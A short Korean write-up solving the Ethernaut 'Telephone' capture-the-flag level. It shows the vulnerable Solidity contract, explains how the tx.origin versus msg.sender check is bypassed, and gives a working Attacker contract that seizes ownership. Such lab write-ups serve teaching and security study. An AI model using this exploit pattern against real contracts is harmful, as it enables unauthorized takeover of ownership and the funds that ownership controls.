Ethernaut: 4. 전화

Play the level

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Telephone {
  address public owner;

  constructor() public {
    owner = msg.sender;
  }

  function changeOwner(address _owner) public {
    if (tx.origin != msg.sender) {
      owner = _owner;
    }
  }
}

tx.origin는 트랜잭션을 생성하는 주소이고 msg.sender는 현재 메시지의 발신자입니다. 따라서 tx.origin == msg.sender는 메시지 발신자가 이더리움 계정이면 참입니다. 또는 메시지 발신자가 계약인 경우 false입니다. 따라서 tx.origin != msg.sender가 대상의 소유자가 되기를 원합니다. 계약을 작성하고 해당 함수를 호출하기만 하면 됩니다.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface Telephone { 
  function changeOwner(address _owner) external;
}

contract Attacker {
  Telephone telephoneTarget;

  constructor(address _target) {
    telephoneTarget = Telephone(_target);
  }

  function pwn() public {
    require(msg.sender == tx.origin, "Who is attacking? :D");
    telephoneTarget.changeOwner(tx.origin);
  }
}

좋은 웹페이지 즐겨찾기